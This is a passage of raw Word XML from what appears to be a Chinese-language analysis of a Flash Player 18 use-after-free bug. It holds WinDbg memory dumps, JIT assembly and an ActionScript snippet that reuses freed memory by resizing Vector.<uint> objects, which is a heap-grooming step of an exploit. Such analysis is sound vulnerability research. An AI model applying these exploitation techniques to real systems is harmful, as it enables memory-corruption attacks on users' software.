          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后返回</w:t>
      </w:r>
      <w:r w:rsidR="00506FD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B24F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到相应的</w:t>
      </w:r>
      <w:r w:rsidR="004B24F0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jitcode</w:t>
      </w:r>
      <w:r w:rsidR="00506FD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B944EA" w:rsidRDefault="00B944EA" w:rsidP="008C5A13"/>
    <w:p w:rsidR="00366135" w:rsidRDefault="00366135" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jitcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF41E4" w:rsidRDefault="00CF41E4" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c736e 83ec0c          sub     esp,0Ch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF41E4" w:rsidRDefault="00CF41E4" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7371 57              push    edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF41E4" w:rsidRDefault="00CF41E4" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7372 e8a9d531fe      call    Flash32_18_0_0_203!IAEModule_IAEKernel_UnloadModule+0x1ee260 (07be4920)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF41E4" w:rsidRDefault="00CF41E4" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7377 83c40c          add     esp,0Ch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF41E4" w:rsidRDefault="00CF41E4" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c737a 8985fcfeffff    mov     dword ptr [ebp-104h],eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF41E4" w:rsidRDefault="00CF41E4" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7380 8bbdfcfeffff    mov     edi,dword ptr [ebp-104h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF41E4" w:rsidRDefault="00CF41E4" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7386 89bdf4feffff    mov     dword ptr [ebp-10Ch],edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD0BF0" w:rsidRDefault="00CF41E4" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>098c738c eb19            jmp     098c73a7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360A97" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c740e 83ec04          sub     esp,4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7411 57              push    edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7412 6a01            push    1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7414 53              push    ebx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRPr="002F1175" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1175">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>098c7415 ffd0            call    eax</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1175">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F1175" w:rsidRPr="002F1175">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002F1175">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//recreateline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7417 83c410          add     esp,10h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c741a c7458c64000000  mov     dword ptr [ebp-74h],64h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7421 c7458c66000000  mov     dword ptr [ebp-74h],66h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7428 8b5e10          mov     ebx,dword ptr [esi+10h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c742b c7458c68000000  mov     dword ptr [ebp-74h],68h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRPr="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F35D7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>098c7432 8d5b01          lea     ebx,[ebx+1]</w:t>
      </w:r>
      <w:r w:rsidRPr="004F35D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  //0-5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7435 c7458c69000000  mov     dword ptr [ebp-74h],69h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c743c c7458c6b000000  mov     dword ptr [ebp-74h],6Bh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7443 c7458c6c000000  mov     dword ptr [ebp-74h],6Ch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c744a 895e10          mov     dword ptr [esi+10h],ebx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c744d c7458c6e000000  mov     dword ptr [ebp-74h],6Eh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7454 8b75b8          mov     esi,dword ptr [ebp-48h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7457 89b5fcfeffff    mov     dword ptr [ebp-104h],esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c745d 8bc0            mov     eax,eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c745f c7458c70000000  mov     dword ptr [ebp-74h],70h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="00A34246">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7466 8b5e10          mov     ebx,dword ptr [esi+10h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="004F35D7"/>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="003B3307" w:rsidP="004F35D7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时之前分配的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BackGroudObj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被释放</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B3307" w:rsidRDefault="003B3307" w:rsidP="004F35D7"/>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>0:008&gt; s -d 0x0 l?0x7fffffff 080c4380 00000001 08d550b0 08d4e000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>09952020  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>09959020  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>09959418  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>09959810  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>09959c08  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>0995a020  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>0995a418  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>0995a810  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>0995ac08  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>0995b020  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9">
      <w:r>
        <w:t>0995b418  080c4380 00000001 08d550b0 08d4e000  .C.......P......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9"/>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="007226BD" w:rsidP="009A7BC9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这时只能搜索到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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BackGroudObj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00C466D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面</w:t>
      </w:r>
      <w:r w:rsidR="009A7BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="009A7BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidR="009A7BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BackGroudObj</w:t>
      </w:r>
      <w:r w:rsidR="009A7BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经被释放</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9"/>
    <w:p w:rsidR="009A7BC9" w:rsidRDefault="009A7BC9" w:rsidP="009A7BC9"/>
    <w:p w:rsidR="008C5A13" w:rsidRDefault="0022600C" w:rsidP="008C5A13">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="008C5A13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> reuse feed memmory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5A13" w:rsidRDefault="008C5A13" w:rsidP="00E04C94">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>// reuse freed memory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5A13" w:rsidRDefault="008C5A13" w:rsidP="00E04C94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for(i=_arLen2; i &lt; _arLen; i++)</w:t>
      </w:r>
      <w:r w:rsidR="00D00ABC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D00ABC" w:rsidRPr="00E04C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//0x2e</w:t>
      </w:r>
      <w:r w:rsidR="00D00ABC" w:rsidRPr="00E04C94">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;=I </w:t>
      </w:r>
      <w:r w:rsidR="00D00ABC" w:rsidRPr="00E04C94">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&lt; 0x7e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5A13" w:rsidRDefault="008C5A13" w:rsidP="00E04C94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_ar[i].length = _vLen;</w:t>
      </w:r>
      <w:r w:rsidR="00D00ABC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D00ABC" w:rsidRPr="0075603E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//0x62</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B0D30" w:rsidRDefault="00750FCC" w:rsidP="008C5A13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此段代码的对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x2e-0x7e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector&lt;uint&gt;(8)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象长度重新设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发重新分配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750FCC" w:rsidRDefault="00750FCC" w:rsidP="008C5A13"/>
    <w:p w:rsidR="002B0D30" w:rsidRDefault="0022600C" w:rsidP="008C5A13">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续跟踪之前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jit code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后即可看到这里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B0D30" w:rsidRPr="00BF3F7A" w:rsidRDefault="00BD7832" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>it code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c75e9 8b7db8          mov     edi,dword ptr [ebp-48h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c75ec c7458ca1000000  mov     dword ptr [ebp-74h],0A1h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c75f3 8b5f10          mov     ebx,dword ptr [edi+10h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c75f6 c7458ca3000000  mov     dword ptr [ebp-74h],0A3h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c75fd 8b7e20          mov     edi,dword ptr [esi+20h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7600 83e7f8          and     edi,0FFFFFFF8h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7603 8b7720          mov     esi,dword ptr [edi+20h]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c7606 c7458ca6000000  mov     dword ptr [ebp-74h],0A6h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="004F35D7" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c760d 3bde            cmp     ebx,esi</w:t>
      </w:r>
      <w:r w:rsidR="003B3307">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B3307" w:rsidRPr="00584367">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//2e&lt;0x7e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D58D8" w:rsidRDefault="004F35D7" w:rsidP="005E3D9D">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c760f 0f8cabfeffff    jl      098c74c0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0075603E" w:rsidRDefault="0075603E" w:rsidP="004F35D7"/>
    <w:p w:rsidR="004F35D7" w:rsidRDefault="00B5145E" w:rsidP="004F35D7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前申请的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vector&lt;uint&gt;(8)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新申请</w:t>
      </w:r>
      <w:r w:rsidR="00173CD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对应的</w:t>
      </w:r>
      <w:r w:rsidR="00173CD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
      <w:r w:rsidR="00173CD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度已经改变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>0:008&gt; dd 08f253f9 -1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>08f253f8  08204748 00000002 0934d1f0 092bffd0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>08f25408  09318150 00000000 099541b0 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>08f25418  00000000 00000000 08204748 00000002</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>08f25428  0934d1f0 092bffd0 09318150 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>08f25438  09954340 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>08f25448  08204748 00000002 0934d1f0 092bffd0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>08f25458  09318150 00000000 099544d0 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>08f25468  00000000 00000000 08204748 00000002</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t xml:space="preserve">0:008&gt; dd 099541b0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t xml:space="preserve">099541b0  </w:t>
      </w:r>
      <w:r w:rsidRPr="0075603E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">00000062 </w:t>
      </w:r>
      <w:r>
        <w:t>08d42000 0000002e 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099541c0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5145E" w:rsidRDefault="00B5145E" w:rsidP="00B5145E">
      <w:r>
        <w:t>099541d0  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
